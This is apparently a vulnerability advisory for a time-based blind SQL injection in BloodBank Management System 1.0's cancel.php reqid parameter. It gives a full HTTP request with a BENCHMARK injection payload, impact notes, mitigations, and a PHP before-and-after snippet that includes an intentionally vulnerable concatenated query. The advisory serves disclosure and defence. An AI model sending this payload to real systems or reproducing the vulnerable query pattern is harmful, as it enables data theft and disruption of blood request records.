- Affected Product: BloodBank Management System 1.0
- Vulnerability Type: SQL Injection (Time-Based Blind)
- Severity: HIGH
- Status: Unpatched
- Affected Endpoint: /file/cancel.php?reqid=2
A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0, specifically in the cancel request functionality. The flaw arises because the reqid parameter is placed into the SQL query that handles cancellation requests without validation or parameterization, enabling malicious users to inject SQL commands into that query.
The vulnerability allows for a time-based blind SQL injection attack. In this scenario, an attacker injects code that makes the database execute time-intensive operations, such as a call to the BENCHMARK function, to delay the response. If the injected SQL executes, the response is delayed by a predictable amount of time, which confirms the injection even though no query output is ever shown. This technique can lead to:
- Exfiltration of sensitive data over time.
- Denial of Service (DoS) by slowing down the system.
- Tampering with blood request statuses, including unauthorized cancellations.
Below is an example of a GET request demonstrating the time-based blind SQL injection vulnerability:
GET /file/cancel.php?reqid=2'%20AND%202655%3dBENCHMARK(5000000%2cMD5(0x74466957))--%20pFWQ HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A-.%20Our%20team%20will%20contact%20you%20soon.
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
In this PoC, the injected query includes a BENCHMARK call that forces the database to compute MD5 5,000,000 times, resulting in a delayed response if the SQL query executes successfully. The response time confirms the injection vulnerability and demonstrates that the backend is susceptible to such attacks.
- Data Breach: Attackers could extract data from the database over time.
- Denial of Service (DoS): Multiple malicious requests could overload the server, reducing system availability.
- Unauthorized Cancellations: Attackers could cancel blood requests without proper authorization, disrupting critical processes.
- System Integrity Issues: Alterations in request records could cause confusion or operational failures in blood request management.
- Use Parameterized Queries: Replace dynamic queries with prepared statements to prevent SQL injection.
- Input Validation: Ensure that all input parameters, including reqid, are properly validated and sanitized; for a numeric identifier such as reqid, that means accepting only integer values.
- Database Privileges: Limit the database user's permissions to minimize potential damage from an exploit.
- Error Handling: Avoid exposing detailed error messages that might aid attackers in crafting injections.
- Rate Limiting and Monitoring: Monitor requests and apply rate limits to prevent denial-of-service attacks.
- Security Testing: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities early.
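The following PHP snippet is an added example for the first two mitigations above, not code from the BloodBank Management System itself: it places the concatenation pattern the advisory describes beside a hardened version that validates reqid as an integer, binds it with a prepared statement, and scopes the update to the logged-in user. The table and column names (blood_request, id, status, user_id) and the session user id are assumptions for illustration.

```php
<?php
// Added example, not the project's own code. Table/column names and the
// session user id are assumptions for illustration.

// BEFORE: the pattern the advisory describes. The raw reqid value is
// concatenated into the SQL string, so anything the client sends in that
// parameter becomes part of the query and is executed by the database.
function cancel_request_vulnerable(mysqli $db, array $get): bool
{
    $sql = "UPDATE blood_request SET status='Cancelled' WHERE id=" . $get['reqid'];
    return $db->query($sql) !== false;
}

// AFTER: reject anything that is not a positive integer, bind the value as a
// parameter so it can never be interpreted as SQL, and require that the
// request belongs to the current user so a valid id still cannot cancel
// somebody else's request.
function cancel_request_safe(mysqli $db, array $get, int $sessionUserId): bool
{
    $reqid = filter_var(
        $get['reqid'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($reqid === false) {
        http_response_code(400); // malformed identifier, nothing is executed
        return false;
    }

    $stmt = $db->prepare(
        "UPDATE blood_request SET status='Cancelled' WHERE id=? AND user_id=?"
    );
    if ($stmt === false) {
        return false; // do not echo $db->error to the client (see Error Handling)
    }
    $stmt->bind_param('ii', $reqid, $sessionUserId);
    $stmt->execute();
    $ok = $stmt->affected_rows === 1; // exactly one owned row was cancelled
    $stmt->close();
    return $ok;
}
```

With the hardened version, the PoC value from the request above fails the integer check and never reaches the database, so no timing difference is observable.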